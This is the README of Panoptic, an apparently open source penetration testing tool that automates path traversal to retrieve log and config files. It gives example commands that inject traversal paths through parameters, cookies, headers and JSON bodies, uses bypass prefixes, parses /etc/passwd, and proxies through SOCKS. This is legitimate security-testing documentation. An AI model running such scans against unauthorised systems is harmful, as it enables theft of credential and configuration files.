Panoptic is an open source penetration testing tool that automates the search and retrieval of common log and config files through path traversal vulnerabilities.
- Async concurrent scanning with configurable worker pool
(
--concurrency) - Automatic discovery of common log and configuration files via parameter-based, path-based, POST, cookie, header, and JSON body injection
- FUZZ marker for arbitrary injection points — place
FUZZin any--headeror--datavalue - Base64 encoding for endpoints that decode file paths
(
--base64) - Automatic OS detection with option to restrict further scans
- Heuristic response comparison with status code filtering to reduce false positives
- Dynamic case injection — parse
/etc/passwdfor home directory files,mysql-bin.indexfor binlog files - Multiple output formats: text (rich), JSON, CSV
(
--output-format) - Resume/checkpoint support for long-running scans
(
--resume-file) - TOML config files for persistent settings (
--config) - Multiple traversal bypass techniques: prefixes, postfixes, multiplier, slash replacement, double encoding
- HTTP/HTTPS and SOCKS4/SOCKS5 proxy support with validation
- Random or custom User-Agent, cookie, and header support
- Credential redaction in banner and log output
- Self-update with remote URL verification (
--update)
- Python 3.10+
- Dependencies:
httpx[socks],rich,rich-argparse
git clone https://github.com/lightos/Panoptic.git
cd Panoptic
pip install -e .For development:
pip install -e ".[dev]"panoptic --url "http://target/include.php?file=test.txt"panoptic --url "http://target/include.php?file=test.txt"
panoptic --url "http://target/include.php?file=test.txt&id=1" \
--param filepanoptic --url "http://target/include.php" \
--data "file=test.txt&id=1" --param filepanoptic --url "http://target/view.php/test.txt" --path-basedpanoptic --url "http://target/load.php?file=dGVzdC50eHQ=" \
--base64 --autopanoptic --url "http://target/page.php" \
--header "Cookie: lang=FUZZ" --autopanoptic --url "http://target/api/load" \
--data '{"file":"FUZZ"}' --autopanoptic --url "http://target/page.php" \
--header "X-Template: FUZZ" --autopanoptic --url "http://target/view.php?file=test&type=txt" \
--param file --ext-param typepanoptic --url "http://target/filtered.php?file=test.txt" \
--prefix "....//....//....//....//"panoptic --url "http://target/include.php?file=test.txt" \
--os "*NIX" --type conf
panoptic --url "http://target/include.php?file=test.txt" \
--software PostgreSQLpanoptic --url "http://target/include.php?file=test.txt" \
--output-format json --output-file results.json \
--resume-file scan.checkpointpanoptic --url "https://target/include.php?file=test.txt" \
--proxy "socks5://127.0.0.1:9050" --invalid-sslpanoptic --list software
panoptic --list category
panoptic --list ospanoptic --url "http://target/include.php?file=test.txt" \
--auto --all-versions --concurrency 8Place FUZZ anywhere in --header or --data values to mark
the injection point. Panoptic replaces FUZZ with each file path
during scanning. This enables testing injection points that
--param can't reach:
| Injection Type | Example |
|---|---|
| Cookie value | --header "Cookie: theme=FUZZ" |
| Custom header | --header "X-Include: FUZZ" |
| JSON body | --data '{"template":"FUZZ"}' |
| Nested value | --header "Cookie: sid=abc; lang=FUZZ" |
When FUZZ is present, --param is not required.
Panoptic supports TOML config files for persistent settings:
panoptic --url "http://target/include.php?file=test.txt" \
--config ~/.config/panoptic/config.tomlDefault config location: ~/.config/panoptic/config.toml
[defaults]
concurrency = 8
verbose = true
automatic = true
[proxy]
url = "socks5://127.0.0.1:9050"
[headers]
user_agent = "Mozilla/5.0"Priority: CLI args > config file > built-in defaults.
Contributions are welcome! Please open issues or pull requests on GitHub.
This project is licensed under the MIT License - see the LICENSE file for details.
